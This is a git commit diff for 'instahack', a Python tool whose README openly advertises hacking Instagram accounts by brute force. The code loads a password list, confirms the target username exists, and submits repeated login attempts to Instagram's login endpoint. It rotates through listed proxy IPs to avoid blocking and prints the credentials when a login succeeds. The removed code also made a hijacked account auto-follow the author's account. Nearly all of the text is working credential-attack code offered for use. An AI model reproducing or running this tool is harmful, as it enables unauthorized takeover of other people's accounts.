mark0909099 · inayatbindra · Mar 16, 2017 · Mar 16, 2017 · Mar 16, 2017 · Mar 16, 2017
diff --git a/README.md b/README.md
@@ -1,3 +1,6 @@
 # instahack
-Hack instagram bruteforce
+[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=ARVABYAUX3NPC)
+
+###### [*] Hack instagram accounts use bruteforce
+###### [*] for more proxy - go to https://www.torvpn.com/en/proxy-list
 ![alt tag](https://raw.githubusercontent.com/avramit/instahack/master/screenshot.jpg)
diff --git a/hackinsta.py b/hackinsta.py
@@ -1,110 +1,168 @@
+
+'''
+TODO LIST:
+	Fix and make proxy function better
+	Sort code again
+	Add help function to all "Yes/no" questions
+	Add help  function to "Press enter to exit input"
+'''
 import requests
 import json
 import time
 import os
-
-filename = 'pass.txt'
-if os.path.isfile(filename):
-	with open(filename) as f:
-	    passwords = f.read().splitlines()
-	    if (len(passwords) > 0):
-	    	print ('%s Passwords loads successfully' % len(passwords))
-else:
-	print ('Please create passwords file (pass.txt)')
-	exit()
-
-
-
-
-def userExists(username):
-	r = requests.get('https://www.instagram.com/%s/?__a=1' % username) 
-	if (r.status_code == 404):
-		print ('User not found')
-		return False
-	elif (r.status_code == 200):
-		followdata = json.loads(r.text)
-		fUserID = followdata['user']['id']
-		return {'username':username,'id':fUserID}
-
-
-def Login(username,password):
-	sess = requests.Session()
-	sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '',  's_network' : '', 'ds_user_id' : ''})
-	sess.headers.update({
-		'UserAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
-		'x-instagram-ajax':'1',
-		'X-Requested-With': 'XMLHttpRequest',
-		'origin': 'https://www.instagram.com',
-		'ContentType' : 'application/x-www-form-urlencoded',
-		'Connection': 'keep-alive',
-		'Accept': '*/*',
-		'Referer': 'https://www.instagram.com',
-		'authority': 'www.instagram.com',
-		'Host' : 'www.instagram.com',
-		'Accept-Language' : 'ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4',
-		'Accept-Encoding' : 'gzip, deflate'
-	})
-
-	#first time -> to get csrftoken
-	r = sess.get('https://www.instagram.com/') 
-	sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})
-
-	data = {'username':username, 'password':password}
-	r = sess.post('https://www.instagram.com/accounts/login/ajax/', data=data, allow_redirects=True)
-	token = r.cookies.get_dict()['csrftoken']
-	sess.headers.update({'X-CSRFToken' : token})
-	#parse response
-	data = json.loads(r.text)
-	if (data['status'] == 'fail'):
-		print (data['message'])
-		return False
-
-	if (data['authenticated'] == True):
-		return sess #if we want to keep use session
+import random
+import sys
+
+#Help function
+def Input(text):
+	value = ''
+	if sys.version_info.major > 2:
+		value = input(text)
 	else:
-		print ('Password incorrect [%s]' % password)
-		return False
+		value = raw_input(text)
+	return str(value)
+
+#The main class
+class Instabrute():
+	def __init__(self, username, passwordsFile='pass.txt'):
+		self.username = username
+		self.CurrentProxy = ''
+		self.UsedProxys = []
+		self.passwordsFile = passwordsFile
+
+		#Check if passwords file exists
+		self.loadPasswords()
+		#Check if username exists
+		self.IsUserExists()
+
+
+		UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper()
+		if (UsePorxy == 'Y' or UsePorxy == 'YES'):
+			self.randomProxy()
+
+
+	#Check if password file exists and check if he contain passwords
+	def loadPasswords(self):
+		if os.path.isfile(self.passwordsFile):
+			with open(self.passwordsFile) as f:
+				self.passwords = f.read().splitlines()
+				passwordsNumber = len(self.passwords)
+				if (passwordsNumber > 0):
+					print ('[*] %s Passwords loads successfully' % passwordsNumber)
+				else:
+					print('Password file are empty, Please add passwords to it.')
+					Input('[*] Press enter to exit')
+					exit()
+		else:
+			print ('Please create passwords file named "%s"' % self.passwordsFile)
+			Input('[*] Press enter to exit')
+			exit()
 
+	#Choose random proxy from proxys file
+	def randomProxy(self):
+		plist = open('proxy.txt').read().splitlines()
+		proxy = random.choice(plist)
+
+		if not proxy in self.UsedProxys:
+			self.CurrentProxy = proxy
+			self.UsedProxys.append(proxy)
+		try:
+			print('')
+			print('[*] Check new ip...')
+			print ('[*] Your public ip: %s' % requests.get('http://myexternalip.com/raw', proxies={ "http": proxy, "https": proxy },timeout=10.0).text)
+		except Exception as e:
+			print  ('[*] Can\'t reach proxy "%s"' % proxy)
+		print('')
+
+
+	#Check if username exists in instagram server
+	def IsUserExists(self):
+		r = requests.get('https://www.instagram.com/%s/?__a=1' % self.username) 
+		if (r.status_code == 404):
+			print ('[*] User named "%s" not found' % username)
+			Input('[*] Press enter to exit')
+			exit()
+		elif (r.status_code == 200):
+			return True
+
+	#Try to login with password
+	def Login(self, password):
+		sess = requests.Session()
+
+		if len(self.CurrentProxy) > 0:
+			sess.proxies = { "http": self.CurrentProxy, "https": self.CurrentProxy }
+
+		#build requests headers
+		sess.cookies.update ({'sessionid' : '', 'mid' : '', 'ig_pr' : '1', 'ig_vw' : '1920', 'csrftoken' : '',  's_network' : '', 'ds_user_id' : ''})
+		sess.headers.update({
+			'UserAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
+			'x-instagram-ajax':'1',
+			'X-Requested-With': 'XMLHttpRequest',
+			'origin': 'https://www.instagram.com',
+			'ContentType' : 'application/x-www-form-urlencoded',
+			'Connection': 'keep-alive',
+			'Accept': '*/*',
+			'Referer': 'https://www.instagram.com',
+			'authority': 'www.instagram.com',
+			'Host' : 'www.instagram.com',
+			'Accept-Language' : 'en-US;q=0.6,en;q=0.4',
+			'Accept-Encoding' : 'gzip, deflate'
+		})
+
+		#Update token after enter to the site
+		r = sess.get('https://www.instagram.com/') 
+		sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})
+
+		#Update token after login to the site 
+		r = sess.post('https://www.instagram.com/accounts/login/ajax/', data={'username':self.username, 'password':password}, allow_redirects=True)
+		sess.headers.update({'X-CSRFToken' : r.cookies.get_dict()['csrftoken']})
+
+		#parse response
+		data = json.loads(r.text)
+		if (data['status'] == 'fail'):
+			print (data['message'])
+
+			UsePorxy = Input('[*] Do you want to use proxy (y/n): ').upper()
+			if (UsePorxy == 'Y' or UsePorxy == 'YES'):
+				print ('[$] Try to use proxy after fail.')
+				randomProxy() #Check that, may contain bugs
+			return False
+
+		#return session if password is correct 
+		if (data['authenticated'] == True):
+			return sess 
+		else:
+			return False
 
 
-def follow(sess, username):
-	username = userExists(username)
-	if (username == False):
-		return	
-	else:
-		userID = username['id']
-		followReq = sess.post('https://www.instagram.com/web/friendships/%s/follow/' % userID)
-		print (followReq.text)
 
 
-username = str(input('Please enter a username: '))
-username = userExists(username)
-if (username == False):
-	exit()
-else:
-	username = username['username']
 
 
+instabrute = Instabrute(Input('Please enter a username: '))
 
-delayLoop = int(input('Please add delay between the passwords (in seconds): ')) 
+try:
+	delayLoop = int(Input('[*] Please add delay between the bruteforce action (in seconds): ')) 
+except Exception as e:
+	print ('[*] Error, software use the defult value "4"')
+	delayLoop = 4
+print ('')
 
 
-for i in range(len(passwords)):
-	password = passwords[i]
-	sess = Login(username,password)
-	if (sess):
-		print ('Login success %s' % [username,password])
 
-		#because i am cool
-		follow(sess,'avr_amit')
+for password in instabrute.passwords:
+	sess = instabrute.Login(password)
+	if sess:
+		print ('[*] Login success %s' % [instabrute.username,password])
+	else:
+		print ('[*] Password incorrect [%s]' % password)
 
 	try:
 		time.sleep(delayLoop)
 	except KeyboardInterrupt:
-		an = str(input('Type y/n to exit: '))
-		if (an == 'y'):
+		WantToExit = str(Input('Type y/n to exit: ')).upper()
+		if (WantToExit == 'Y' or WantToExit == 'YES'):
 			exit()
 		else:
 			continue
 
-
diff --git a/proxy.txt b/proxy.txt
@@ -0,0 +1,2 @@
+51.15.46.137
+149.56.81.59
diff --git a/screenshot.jpg b/screenshot.jpg